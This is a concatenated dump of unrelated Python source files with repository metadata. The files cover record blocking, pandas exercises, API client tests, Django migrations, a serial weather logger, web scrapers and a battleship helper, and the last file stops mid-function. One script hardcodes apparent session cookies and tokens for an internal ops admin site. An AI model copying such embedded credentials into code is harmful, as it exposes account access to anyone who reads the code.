self.weak_blocks = dict()
if not single_block:
self._generate_strong_blocks(database)
self._generate_weak_blocks(database)
self._clean_blocks()
self._complete_blocks(database.records.keys())
else:
self._max_block_size = np.Inf
self.weak_blocks['All'] = set(database.records.keys())
def _complete_blocks(self, keys):
"""
Finds ads missing from blocking scheme (due to sparse features), and ads them as single ads to weak blocks
:param keys: List of all the record identifiers that should be in the clustering
"""
used_ads = set()
for _, ads in self.strong_blocks.iteritems():
used_ads.update(ads)
for _, ads in self.weak_blocks.iteritems():
used_ads.update(ads)
missing_ads = set(keys)
missing_ads.difference_update(used_ads)
for ad in missing_ads:
block = 'singular_ad_' + str(ad)
self.weak_blocks[block] = {ad}
def _clean_blocks(self):
"""
Removed blocks larger than max_block_size
"""
toremove = list()
for block, ads in self.strong_blocks.iteritems():
blocksize = len(ads)
if blocksize > self._max_block_size:
toremove.append(block)
for remove in toremove:
del self.strong_blocks[remove]
toremove = list()
for block, ads in self.weak_blocks.iteritems():
blocksize = len(ads)
if blocksize > self._max_block_size:
toremove.append(block)
for remove in toremove:
del self.weak_blocks[remove]
def number_of_blocks(self):
"""
Determines the total number of blocks
:return num_blocks: The total number of weak and strong blocks
"""
num_blocks = len(self.weak_blocks) + len(self.strong_blocks)
return num_blocks
def _generate_strong_blocks(self, database):
self._generate_blocks('strong', self.strong_blocks, database)
def _generate_weak_blocks(self, database):
self._generate_blocks('weak', self.weak_blocks, database)
@staticmethod
def _generate_blocks(block_strength, blocks_pointer, database):
"""
Generates the blocking scheme [block_name, set of ad indices in block]
:param block_strength: String 'weak' or 'strong'
:param blocks_pointer: Blocks to mutate, either self.strong_blocks or self.weak_blocks
:param database: RecordDatabase object
"""
to_block = list()
for index, (strength, blocking) in enumerate(izip(database.feature_descriptor.strengths,
database.feature_descriptor.blocking)):
if (strength == block_strength) & (blocking == 'block'): # did user specify blocking for this feature?
to_block.append(index)
for record_id, record in database.records.iteritems(): # loop through all the records
print block_strength, 'blocking ad', record_id
for index in to_block:
feature_name = database.feature_descriptor.names[index]
for subfeature in record.features[index]:
feature = feature_name + '_' + str(subfeature)
if feature in blocks_pointer:
blocks_pointer[feature].add(record_id)
else:
blocks_pointer[feature] = {record_id} | UTF-8 | Python | false | false | 4,194 | py | 36 | blocking.py | 25 | 0.594897 | 0.594659 | 0 | 100 | 40.95 | 119 |
zk040377/load2python | 16,192,026,740,302 | 7e0b63305d41406468c3b05acdc294258018c883 | 546fda8ea4c37dd9b633ab2fb81ae18987085bb6 | /用Python玩转数据/3.2-exercise.py | edaa2350bc1cb2665e704287054e0beca5e2c851 | []
| no_license | https://github.com/zk040377/load2python | a454addb9465848b5408685498eee25cb198140d | 82eab48182fcfdf16450e0b66e81377d2f4a7385 | refs/heads/master | 2022-01-08T04:57:58.551691 | 2018-10-17T06:44:53 | 2018-10-17T06:44:53 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # coding:utf-8
import numpy as np
from pandas import Series, DataFrame
a = np.array([(1, 2, 3), (4, 5, 6), (7, 8, 9)])
print a[2].sum()
print sorted(set('You need Python.'))
sa = Series(['a', 'b', 'c'], index = [0, 1, 2])
sb = Series(['a', 'b', 'c'])
sc = Series(['a', 'c', 'b'])
print sa.equals(sc)
print sb.equals(sa)
data = {'language': ['Java', 'PHP', 'Python', 'R', 'C#'],
'year': [ 1995 , 1995 , 1991 ,1993, 2000]}
frame = DataFrame(data)
frame['IDE'] = Series(['Intellij', 'Notepad', 'IPython', 'R studio', 'VS'])
print frame['IDE']
aList = ['VS','Sublime']
print 'VS' in frame['IDE'] # frame['IED']是一个Series
print 'VS' in aList | UTF-8 | Python | false | false | 662 | py | 206 | 3.2-exercise.py | 178 | 0.564024 | 0.512195 | 0 | 23 | 27.565217 | 75 |
daaain/onfido-python | 6,674,379,221,572 | c2b65c067165acfd08a144f6c0bb41c262ed6a06 | e1d141ea82b489ba581d6df68bfe68431e901e2d | /tests/test_checks.py | c595f4f7feb9f5fdea9204bb66c1f48be6326222 | [
"MIT"
]
| permissive | https://github.com/daaain/onfido-python | 5283f418110dc77d3c8089ed545975293c8cc0ff | 62675c97cf7d03de2ab3ed4b07ec0bde9e2b1a5d | refs/heads/master | 2022-12-01T23:47:32.090799 | 2020-08-12T12:58:31 | 2020-08-12T12:58:31 | 288,395,465 | 0 | 0 | NOASSERTION | true | 2020-08-18T08:12:19 | 2020-08-18T08:12:19 | 2020-08-12T12:59:23 | 2020-08-12T12:59:20 | 830 | 0 | 0 | 0 | null | false | false | import onfido
api = onfido.Api("<AN_API_TOKEN>")
fake_uuid = "58a9c6d2-8661-4dbd-96dc-b9b9d344a7ce"
check_details = {
"applicant_id": fake_uuid,
"report_names": ["identity_enhanced"]
}
def test_create_check(requests_mock):
mock_create = requests_mock.post("https://api.onfido.com/v3/checks/", json=[])
api.check.create(check_details)
assert mock_create.called is True
assert mock_create.last_request.text is not None
def test_find_check(requests_mock):
mock_find = requests_mock.get(f"https://api.onfido.com/v3/checks/{fake_uuid}", json=[])
api.check.find(fake_uuid)
assert mock_find.called is True
def test_list_checks(requests_mock):
mock_list = requests_mock.get(f"https://api.onfido.com/v3/checks/?applicant_id={fake_uuid}", json=[])
api.check.all(fake_uuid)
assert mock_list.called is True
def test_resume_check(requests_mock):
mock_resume = requests_mock.post(f"https://api.onfido.com/v3/checks/{fake_uuid}/resume", json=[])
api.check.resume(fake_uuid)
assert mock_resume.called is True
| UTF-8 | Python | false | false | 1,061 | py | 16 | test_checks.py | 14 | 0.69934 | 0.678605 | 0 | 32 | 32.15625 | 105 |
Palashnenkoff/YaMDb | 498,216,241,810 | efc297f366c23f9c1607e5b500e315e89d200141 | fd34df978209b29fbedf7836859de6f978deba14 | /reviews/migrations/0002_auto_20210822_0907.py | 6ce6b991a00d5e7d161ab8d25d9fc63490ba63b3 | []
| no_license | https://github.com/Palashnenkoff/YaMDb | 6b2d00a293127d51b3dbc837c66ff00118b5bc18 | a67342d2ce4fbf919a7112c36fd3a61b4cfbec63 | refs/heads/master | 2023-08-27T14:59:50.392946 | 2021-11-03T11:19:18 | 2021-11-03T11:19:18 | 418,856,253 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Generated by Django 2.2.16 on 2021-08-22 06:07
from django.conf import settings
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('reviews', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='comment',
options={'verbose_name': 'Comment', 'verbose_name_plural': 'Comments'},
),
migrations.AlterModelOptions(
name='review',
options={'verbose_name': 'Review', 'verbose_name_plural': 'Reviews'},
),
migrations.AlterField(
model_name='comment',
name='author',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='comments', to=settings.AUTH_USER_MODEL, verbose_name='comment author'),
),
migrations.AlterField(
model_name='comment',
name='pub_date',
field=models.DateTimeField(auto_now_add=True, verbose_name='date of publication'),
),
migrations.AlterField(
model_name='comment',
name='review',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='comments', to='reviews.Review', verbose_name='comment to review'),
),
migrations.AlterField(
model_name='comment',
name='text',
field=models.TextField(verbose_name='comment text'),
),
migrations.AlterField(
model_name='review',
name='author',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='reviews', to=settings.AUTH_USER_MODEL, verbose_name='reviews author'),
),
migrations.AlterField(
model_name='review',
name='pub_date',
field=models.DateTimeField(auto_now_add=True, verbose_name='date of publication'),
),
migrations.AlterField(
model_name='review',
name='score',
field=models.IntegerField(validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(10)], verbose_name=' authors mark'),
),
migrations.AlterField(
model_name='review',
name='text',
field=models.TextField(verbose_name='reviews text'),
),
migrations.AlterField(
model_name='review',
name='title',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='reviews', to='titles.Title', verbose_name='title'),
),
]
| UTF-8 | Python | false | false | 2,693 | py | 21 | 0002_auto_20210822_0907.py | 18 | 0.60156 | 0.593019 | 0 | 69 | 38.028986 | 172 |
Planet-Moon/Weatherstation | 17,257,178,622,408 | 168532b17a87c476f78a2fe2ebb7ba6ac696d4b0 | 127c9376d2e8fbff8ca2d162670418ebc2357c77 | /ReadSerial_Wetterstation.py | dc3667826dc76d99e39268a39e25b37f831797d0 | []
| no_license | https://github.com/Planet-Moon/Weatherstation | fe4da879f15058a56761eaecdd530b97eaf02ebe | 2c1ddd779939f9a2c24d01b0d5c39be01814fe2a | refs/heads/main | 2023-01-08T06:50:41.596959 | 2020-11-14T13:07:18 | 2020-11-14T13:07:18 | 307,520,109 | 0 | 0 | null | false | 2020-10-31T21:56:59 | 2020-10-26T22:26:21 | 2020-10-31T21:50:34 | 2020-10-31T21:56:58 | 731 | 0 | 0 | 0 | C++ | false | false | #ReadSerial.py
import serial
import time
import platform
import datetime
import struct
import os
import sys
import errno
debug = 0
write_file_flag = 1
dummyOutput_flag = 0
output_path = ""
op_sys = platform.system()
print("op_sys: "+str(op_sys))
if(op_sys == "Linux"):
port = "/dev/ttyACM0"
elif(op_sys == "Windows"):
port = "COM3"
def bytes_to_int(input_bytes):
result = 0
for b in input_bytes:
result = result * 256 + int(b)
return result
def ensure_dir(file_path):
directory = os.path.dirname(file_path)
if not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def check_arguments(sys_argv):
global debug, write_file_flag, dummyOutput_flag, output_path
used_arguments = [0,0,0,0,0,0]
for arg in sys_argv:
if(arg == "-new"):
os.remove(logfile)
print("creating new file...")
time.sleep(2)
used_arguments[0] = 1
if(arg == "-debug"):
debug = 1
used_arguments[1] = 1
if(arg == "-nofile"):
used_arguments[2] = 1
write_file_flag = 0
print("not writing to output file")
if(arg == "-example"):
used_arguments[3] = 1
dummyOutput_flag = 1
print("creating example output file...")
if(arg.find("-dir=")==0):
output_path = arg[arg.find("-dir=")+len("-dir="):] # get all chars in argument after "-dir="
used_arguments[4] = 1
print("changed directory of output file to: \""+output_path+"\"")
if(output_path[-1]!="/"):
output_path += "/" # check if last char is a "/", if not append one
ensure_dir(output_path) # check of output_path is a directory, if not create it
if((arg == "-help") or (arg == "-h")):
used_arguments[5] = 1
if((used_arguments[0] == 0) or (used_arguments[5] == 1)):
print("append argument \"-new\" to create new csv-file, appending existing csv-file")
if((used_arguments[1] == 0) or (used_arguments[5] == 1)):
print("append argument \"-debug\" to output debug information")
if((used_arguments[2] == 0) or (used_arguments[5] == 1)):
print("append argument \"-nofile\" to not write data to output file")
if((used_arguments[3] == 0) or (used_arguments[5] == 1)):
print("append argument \"-example\" to create example output file")
if((used_arguments[4] == 0) or (used_arguments[5] == 1)):
print("append argument \"-dir=dirname\" to change directory of output file")
if(used_arguments[5] == 1):
exit()
check_arguments(sys.argv)
try:
if(not dummyOutput_flag):
ser = serial.Serial(port, baudrate = 9600 )
else:
print("Skipped opening serial port")
except:
print("Error opening Serial Port")
exit()
print("starting")
if(not dummyOutput_flag):
ser.readline()
while True:
date_now = datetime.datetime.now()
if(not dummyOutput_flag):
rcv = ser.readline()
date_string = str(date_now.strftime("%Y")) + ";" + str(date_now.strftime("%m")) + ";" + str(date_now.strftime("%d")) + ";" + str(date_now.strftime("%H")) + ";" + str(date_now.strftime("%M")) + ";" + str(date_now.strftime("%S"))
data_string = rcv.decode()
data_string = data_string.replace("\t",";")
data_string = data_string.replace("\n",";")
output_string = date_string+";"+data_string+"\n"
example_string = ""
if(dummyOutput_flag):
example_string = "example"
logfile = output_path+"Wetterlog"+str(date_now.date())+"_"+example_string+".csv"
write_mode = "w" #overwrite existing
append_mode = "a" #append existing
if(not os.path.exists(logfile)):
file = open(logfile,write_mode)
file.write("Year;Month;Day;Hour;Minute;Second;Relative Humidity;Temperature;Atmospheric Pressure;UP;bmp_temperature;Lightintensity\n")
file.close()
if(not dummyOutput_flag):
i = 0
for pos in output_string:
#print("pos: "+pos)
if(pos == ";"):
i = i + 1
if((i == 12) and (write_file_flag == 1)):
file = open(logfile,append_mode)
file.write(output_string)
file.close()
if(debug == 1):
print("data_string: "+output_string)
print("number of fields: "+str(i))
if(dummyOutput_flag):
print("Created example output file: "+logfile)
exit() | UTF-8 | Python | false | false | 4,616 | py | 8 | ReadSerial_Wetterstation.py | 3 | 0.564991 | 0.55091 | 0 | 141 | 31.744681 | 235 |
camirmas/book-tracker-django | 1,838,246,036,551 | eaab0780ec5bf2f9e46865579515ee7eec8204b7 | 23419b72f2e059a2e98bea8c9ee928608b947fae | /tracker_app/migrations/0001_initial.py | 3f4b1f177cda2cbe186f21cc76a2e006d55a424e | []
| no_license | https://github.com/camirmas/book-tracker-django | 1ba5325d95fbff57de88b15e1359ecfebcc7c1be | 6ab17e70476a55997ba3888ec0d4ccdad5f73158 | refs/heads/master | 2016-05-23T13:23:18.713452 | 2015-04-01T07:52:14 | 2015-04-01T07:52:14 | 33,083,573 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Book',
fields=[
('id', models.AutoField(serialize=False, auto_created=True, primary_key=True, verbose_name='ID')),
('isbn', models.CharField(max_length=13)),
('title', models.CharField(max_length=300)),
('publisher', models.CharField(max_length=300)),
('city', models.CharField(max_length=300)),
('year', models.IntegerField()),
('author_first', models.CharField(max_length=300)),
('author_middle', models.CharField(blank=True, max_length=300)),
('author_last', models.CharField(max_length=300)),
('mla_citation', models.TextField()),
('page_count', models.IntegerField()),
('progress', models.FloatField()),
('owner', models.ForeignKey(related_name='books', to=settings.AUTH_USER_MODEL)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Quote',
fields=[
('id', models.AutoField(serialize=False, auto_created=True, primary_key=True, verbose_name='ID')),
('description', models.TextField()),
('page_number', models.IntegerField()),
('book', models.ForeignKey(to='tracker_app.Book')),
],
options={
},
bases=(models.Model,),
),
]
| UTF-8 | Python | false | false | 1,828 | py | 7 | 0001_initial.py | 7 | 0.531729 | 0.520241 | 0 | 48 | 37.083333 | 114 |
julieqiu/python-finances | 2,946,347,612,644 | ef52d86221889ea1688e8d7cb7edd2669df7132e | 6a15ca69993b6db29f8c8f0213ff17e8a4d8b65f | /finances/database/models/db_transaction_classification.py | f37ae90b2be4b829e124ea2b3c5c48447d5f24c7 | []
| no_license | https://github.com/julieqiu/python-finances | aa84de5bcf3dd48fce2b99bd4a63fbe0c4b2acfe | 9e3223ba7e7927f9cceff8b4b331a8781decd78d | refs/heads/master | 2020-03-23T05:49:58.904674 | 2019-01-11T01:25:52 | 2019-01-11T01:25:52 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from sqlalchemy.orm import relationship
from sqlalchemy import ARRAY, JSON, Integer, Column, String, Text, Boolean, ForeignKey, Numeric, UniqueConstraint
from finances.database.models.base import Base
class DbTransactionClassification(Base):
__tablename__ = 'transaction_classifications'
__table_args__ = (UniqueConstraint('l1', 'l2', 'l3'),)
id = Column(Integer, primary_key=True)
l1 = Column(String, nullable=False)
l2 = Column(String, nullable=False)
l3 = Column(String, nullable=False)
phrases = Column(ARRAY(Text), nullable=False)
| UTF-8 | Python | false | false | 569 | py | 91 | db_transaction_classification.py | 62 | 0.727592 | 0.717047 | 0 | 16 | 34.5625 | 113 |
CrazySunix/Spider | 12,953,621,390,298 | 1a7b5cfdc6a197e692a40cee07d6f23f2f706338 | 8b7bce38a9260fd80c9ccb623925c85e5eed8e26 | /58Project/processing.py | 0c8f5f96fac1175e495439dbe22120854e51aefe | []
| no_license | https://github.com/CrazySunix/Spider | bfc6b93fc02a0fdf73d5f4a02f5f1f6715b63286 | d36ce6c6eda20f80baf1d8f92fce31cd823c6ed8 | refs/heads/master | 2020-02-22T07:35:57.892013 | 2017-08-23T08:42:14 | 2017-08-23T08:42:14 | 100,044,189 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from multiprocessing import pool
from page_parsing import get_links_from,url_list,item_info,get_item_info
from channel_extract import channel_list
db_urls = [item['url'] for item in url_list.find()]
index_urls = [item['url'] for item in item_info.find()]
x = set(db_urls)
y = set(index_urls)
rest_of_urls = x - y | UTF-8 | Python | false | false | 313 | py | 5 | processing.py | 4 | 0.728435 | 0.728435 | 0 | 9 | 33.888889 | 72 |
shanmugharajk/QaNet | 6,347,961,694,434 | 524212efeac37e1cd6958ff1713514c723d8e6d6 | 945feb5d2d1cbd9084c04c1ec89187557df64018 | /src/qanet/post/models.py | 1122cd6680a5cdecbdcf24a9763d05fb0c4b768e | []
| no_license | https://github.com/shanmugharajk/QaNet | d4d05e95b4f48fe9de35ebbd5a5ec525c3e01c94 | b088a3b5f3b2f48632aa20b5fcf82640dc02da17 | refs/heads/main | 2021-06-14T00:11:37.683936 | 2021-04-19T02:58:42 | 2021-04-21T03:47:11 | 145,062,733 | 16 | 3 | null | false | 2021-03-08T16:10:45 | 2018-08-17T02:38:15 | 2021-01-03T21:32:06 | 2021-01-21T01:55:28 | 14,019 | 10 | 3 | 1 | Go | false | false | from sqlalchemy import Column, DateTime, ForeignKey, Integer, String, Table
from sqlalchemy.orm import relationship
from sqlalchemy.sql.schema import PrimaryKeyConstraint
from qanet.enums import PostType
from qanet.models import OwnerEditorMixin, TimeStampMixin
from qanet.database.core import Base
assoc_question_post_tags = Table(
"assoc_question_post_tags",
Base.metadata,
Column("post_tag_id", String, ForeignKey("post_tag.id")),
Column("post_id", Integer, ForeignKey("post.id")),
PrimaryKeyConstraint("post_tag_id", "post_id"),
)
class Post(Base, OwnerEditorMixin, TimeStampMixin):
id = Column(Integer, primary_key=True)
post_type = Column(Integer, default=PostType.question)
points = Column(Integer, nullable=True)
title = Column(String, nullable=True)
content = Column(String)
tags = relationship("PostTag", secondary=assoc_question_post_tags, cascade="all, delete")
parent_id = Column(Integer, ForeignKey("post.id"), nullable=True)
answers_count = Column(Integer, default=0)
accepted_answer_id = Column(Integer, ForeignKey("post.id"), nullable=True)
bookmarks_count = Column(Integer, default=0)
close_votes = Column(Integer, nullable=True)
closed_by_user_id = Column(String, ForeignKey("qanet_user.id"), nullable=True)
closed_date = Column(DateTime, nullable=True)
deleted_date = Column(DateTime, nullable=True)
closed_by = relationship("QanetUser", foreign_keys=[closed_by_user_id])
comments = relationship("Comment", lazy="noload")
| UTF-8 | Python | false | false | 1,535 | py | 202 | models.py | 105 | 0.730293 | 0.72899 | 0 | 39 | 38.358974 | 93 |
survivalcrziest/WordFreqCount | 12,635,793,820,944 | 6ba85094d69d81646abaa50d0cbd741f1e347c70 | d7b87091c834e7827264f90062f93213d494866e | /WordFreqCount.py | 9f1389660382e68a632f2cc93cb8a70a249b0bbb | [
"MIT"
]
| permissive | https://github.com/survivalcrziest/WordFreqCount | e68dfdfd2e90f8c8d1c8f0be54b09b985bef9784 | 965e10ecda6131511e15ee281531303729cae9a0 | refs/heads/master | 2020-12-07T01:41:01.596867 | 2016-08-27T22:23:17 | 2016-08-27T22:23:17 | 66,737,477 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
# TODO: add search phrases
#
import urllib
from bs4 import BeautifulSoup
from collections import Counter
import os
import re
maxAnalysisCount = 150
maxOutputCount = 100
outFileName = "CraftConfWordFreqTrend.csv"
commonWordsFileName = "CommonWords.csv"
def readList(input, separator=''):
retList = list()
with open(input, 'rb') as inputFile:
for line in inputFile:
outline = line.strip()
if outline != "" and not outline.startswith("#"):
if separator == '':
retList.append(outline)
else:
for item in outline.split(separator):
item = item.strip()
if item != "":
retList.append(item)
return retList
def writeHeader(outFileName):
try:
os.remove(outFileName)
except OSError:
pass
with open(outFileName, "a") as outfile:
outfile.write("{0}, {1}, {2}\n".format("Year", "Keyword", "Frequency"))
def parsePage(url, outFileName, prefix):
print "Processing URL: {0}, Result: {1}, Prefix: {2}".format(url, outFileName, prefix)
opener = urllib.urlopen(url)
page = opener.read()
opener.close()
soup = BeautifulSoup(page, "html.parser", from_encoding="UTF-8")
content = soup.find_all("li", "speakers-item")
text = ""
for entry in content:
text += entry.get_text(" ", True)
words = [word.lower() for word in text.split()]
c = Counter(words)
for key in commonWords:
if key in c:
del c[key]
mostCommon = list()
for word, count in c.most_common(maxAnalysisCount):
if not re.search('[–{@#!;+=_,$<(^)>?.:%/&}''"''-]', word):
if not (re.search(u'\u2014', word) or re.search(u'\u2013', word)):
if not re.search('[0-9]', word):
if word:
mostCommon.append((word, count))
else:
print("Skipping: <empty>")
else:
print("Skipping number: {0}".decode('ascii', 'ignore').format(word))
else:
print("Skipping unicode character: {0}".decode('ascii', 'ignore').format(word))
else:
print("Skipping special character: {0}".decode('ascii', 'ignore').format(word))
with open(outFileName, "a") as outfile:
for word, count in mostCommon[:maxOutputCount]:
outfile.write("{0}, {1}, {2}\n".format(prefix, word, count))
print "Done"
# main
commonWords = readList(commonWordsFileName, ',')
writeHeader(outFileName)
parsePage("https://web.archive.org/web/20160325231108/http://craft-conf.com/2016", outFileName, "year2016")
parsePage("https://web.archive.org/web/20160406212403/http://craft-conf.com/2015", outFileName, "year2015")
parsePage("https://web.archive.org/web/20160324192950/http://craft-conf.com/2014", outFileName, "year2014")
| UTF-8 | Python | false | false | 2,592 | py | 4 | WordFreqCount.py | 1 | 0.667568 | 0.630116 | 0 | 83 | 30.180723 | 107 |
wwzskyrain/python-study | 3,307,124,863,959 | 0e26077d3f558f4a04ddc0d7ffda04c5ad9ad31f | b9526da1873e9ba8992a39eb29fe06b6fd2640b4 | /erik/erik/http_erik/http_one.py | fdd6a6191e3a0df878d4bed63202ebd7372c5eae | []
| no_license | https://github.com/wwzskyrain/python-study | a5b35d364bef94683c12818a7c69da06830afb9c | d6bec7ad96775262e46f1ad2fb7b6f0ed83dfd81 | refs/heads/master | 2020-03-21T20:55:19.349582 | 2018-08-09T11:06:29 | 2018-08-09T11:06:29 | 139,036,703 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/Python
# -*- coding: UTF-8 -*-
import urllib.request
import urllib.parse
import json
def request_localhost_and_print():
response = urllib.request.urlopen("http://localhost:8893/students")
html = response.read().decode('utf-8')
print("response: ", html)
loaded_response = json.loads(html)
print(type(loaded_response))
print(loaded_response)
def get_list_spu_id():
file_name = input("请输入专辑ID,以逗号隔开\n")
list_album_ids = file_name.split(",")
return list_album_ids
def get_list_product_id():
input_data = input("请输入productID,以逗号隔开\n")
list_product_id = input_data.split(",")
return list_product_id
def build_search_url_from_spu_id(spu_id=""):
if spu_id.strip() != "":
# print(spu_id)
# need a [static] constant
url_pattern = 'http://ops.ximalaya.com/business-product-admin-web/product/search?categoryId=100&domainId=1&statusId=0&spuId={0}&productId=&productName=&pageNum=1&pageSize=10'
return url_pattern.format(spu_id)
else:
pass
return ""
def build_property_url_from_product_id(product_id=""):
if product_id.strip() != "":
url_pattern = 'http://ops.ximalaya.com/business-product-admin-web/product/properties?productId={0}&categoryId=101'
return url_pattern.format(product_id)
def query_product_properties_by_product_id():
list_product_id = get_list_product_id();
for product_id in list_product_id:
property_query_url = build_property_url_from_product_id(product_id)
header_param = {
'Cookie': 'JSESSIONID=5090B1688F74B6B51A18C58D5D573D4E; _xmLog=xm_1500013288413_j53h6kt9urxl3f; _ga=GA1.2.1440976587.1509762096; login_from=phone; NTKF_T2D_CLIENTID=guestB6A3D8CA-372C-CCC6-E339-DE762EA94018; 1&remember_me=y; 1&_token=103514482&41b752ed078df0445e09d7d08776822e4070; org.springframework.web.servlet.i18n.CookieLocaleResolver.LOCALE=zh_CN; trackType=web; x_xmly_traffic=utm_source%3A%26utm_medium%3A%26utm_campaign%3A%26utm_content%3A%26utm_term%3A%26utm_from%3A; 4&remember_me=y; 4&_token=57877&f54244f92a5c2e15a04ce3553f8df8fc5c6b780dd1ed2b7b875ef6ad46d8df0a; 4_l_flag="57877&f54244f92a5c2e15a04ce3553f8df8fc5c6b780dd1ed2b7b875ef6ad46d8df0a_2018-08-02 16:55:49"; account=133****8888; nickname=luna; Hm_lvt_4a7d8ec50cfd6af753c4f8aee3425070=1532918148,1533215454,1533623796; Hm_lpvt_4a7d8ec50cfd6af753c4f8aee3425070=1533641128; ops-auth=30954EC8AC1A6C147F42; sync=eG1seTIwMTdFUklL'
}
req = urllib.request.Request(property_query_url, headers=header_param)
response = urllib.request.urlopen(req)
response_data = response.read().decode('utf-8')
list_response_data = json.loads(response_data)
list_value = [product_id];
for dic in list_response_data:
dict_attribute_vo = dict(dict(dic).get('attributeVo'))
if dict_attribute_vo.get("id") == 100100006:
list_value.append(100100006)
list_value.append(dict(dic)["value"])
print(list_value)
def query_product_properties_by_spu_id():
list_spu_id = get_list_spu_id()
list_search_url = list(map(build_search_url_from_spu_id, list_spu_id))
header_param = {
'Cookie': 'JSESSIONID=5090B1688F74B6B51A18C58D5D573D4E; _xmLog=xm_1500013288413_j53h6kt9urxl3f; _ga=GA1.2.1440976587.1509762096; login_from=phone; NTKF_T2D_CLIENTID=guestB6A3D8CA-372C-CCC6-E339-DE762EA94018; 1&remember_me=y; 1&_token=103514482&41b752ed078df0445e09d7d08776822e4070; org.springframework.web.servlet.i18n.CookieLocaleResolver.LOCALE=zh_CN; trackType=web; x_xmly_traffic=utm_source%3A%26utm_medium%3A%26utm_campaign%3A%26utm_content%3A%26utm_term%3A%26utm_from%3A; 4&remember_me=y; 4&_token=57877&f54244f92a5c2e15a04ce3553f8df8fc5c6b780dd1ed2b7b875ef6ad46d8df0a; 4_l_flag="57877&f54244f92a5c2e15a04ce3553f8df8fc5c6b780dd1ed2b7b875ef6ad46d8df0a_2018-08-02 16:55:49"; account=133****8888; nickname=luna; Hm_lvt_4a7d8ec50cfd6af753c4f8aee3425070=1532918148,1533215454,1533623796; Hm_lpvt_4a7d8ec50cfd6af753c4f8aee3425070=1533641128; ops-auth=30954EC8AC1A6C147F42; sync=eG1seTIwMTdFUklL'
}
dict_spu_id_to_attribute = {}
for spu_id in iter(list_spu_id):
dict_spu_id_to_attribute.setdefault(spu_id, [])
for spu_id in dict_spu_id_to_attribute.keys():
search_url = build_search_url_from_spu_id(spu_id)
req = urllib.request.Request(search_url, headers=header_param)
response = urllib.request.urlopen(req)
response_data = response.read().decode('utf-8')
response_data_dict = json.loads(response_data)
html_data = response_data_dict["data"]
str_data = str(html_data)
first_colon_index = str_data.index("\"")
second_colon_index = str_data.index("\"", first_colon_index + 1)
product_id = str_data[first_colon_index + 1:second_colon_index]
list_value = list(dict_spu_id_to_attribute[spu_id])
list_value.append(product_id)
property_query_url = build_property_url_from_product_id(product_id)
req = urllib.request.Request(property_query_url, headers=header_param)
response = urllib.request.urlopen(req)
response_data = response.read().decode('utf-8')
list_response_data = json.loads(response_data)
for dic in list_response_data:
dict_attribute_vo = dict(dict(dic).get('attributeVo'))
if dict_attribute_vo.get("id") == 100100006:
list_value.append(100100006)
list_value.append(dict(dic)["value"])
dict_spu_id_to_attribute[spu_id] = list_value
print(dict_spu_id_to_attribute)
query_product_properties_by_product_id()
| UTF-8 | Python | false | false | 5,710 | py | 2 | http_one.py | 2 | 0.702822 | 0.575485 | 0 | 106 | 52.481132 | 907 |
AnkitM18-tech/Python-Introductory-Problems | 9,165,460,242,870 | 6138ae699a69cdd12117055288f5a852678673b4 | 0a5d2213ae89d7364ca79d8f3ba7f5590766554e | /3.Loops/SquareRoot.py | 052b694c28e5f4bd38ea385256ec53b645f1a2ce | []
| no_license | https://github.com/AnkitM18-tech/Python-Introductory-Problems | 5f2e4d2b964d17e7820e30faacb0c8233b8c4eff | aa984b4758d812a529eff820a4c5f21fe7fecd12 | refs/heads/main | 2023-06-25T10:31:33.927879 | 2021-08-01T17:01:29 | 2021-08-01T17:01:29 | 391,678,089 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Tue Jul 7 18:59:13 2020
@author: OCAC
"""
num=float(input("Enter the Number:"))
guess=num/2
eps=10**-12
while abs((guess**2)-num)>eps:
guess=(guess+(num/guess))/2
print("The Approximate Square Root Of The %f is :%.4f"%(num,guess)) | UTF-8 | Python | false | false | 284 | py | 83 | SquareRoot.py | 82 | 0.616197 | 0.545775 | 0 | 17 | 15.764706 | 67 |
roboticmonkey/hb-intro-final-project_Battleship | 5,772,436,073,070 | 31e737bdbf383b0929132e437974f8d83a87bf8f | 13a4d613d3c11972a2bf7b6821d4fe60f4bf3f29 | /utilities.py | f525fdf3e3d5a951bca2d411f9739d5dd522ace5 | []
| no_license | https://github.com/roboticmonkey/hb-intro-final-project_Battleship | a4178eb21ff88566d9a86c81a050de6487fd81c6 | 65ed38b8d8cc7c158c6c209adeb2b85a9a04eedf | refs/heads/master | 2021-01-15T23:46:18.081037 | 2015-10-16T04:13:54 | 2015-10-16T04:13:54 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import board
import random
random.seed()
test_grid = board.Board()
#check for valid number range. returns True of False
def valid_number(user_input):
if (len(user_input) == 2):
if (user_input[1] == "0"):
return False
else:
return True
if (len(user_input) !=2):
if (len(user_input) == 3):
number = user_input[1]+user_input[2]
if (number == "10"):
return True
else:
return False
#remove extra spaces and capitalizes letters returns fixed input
def quick_fix(user_input):
#remove extra spaces
user_input = user_input.strip(" ")
#makes lowercase letters capital
user_input = user_input.upper()
return user_input
#creates grid location returns a list
def generates_grid_location():
num = random.randrange(1, 11)
num2 = random.randrange(1, 11)
num_list = [num, num2]
return num_list
#check for valid letter range return True or False
def valid_letter(user_input, board):
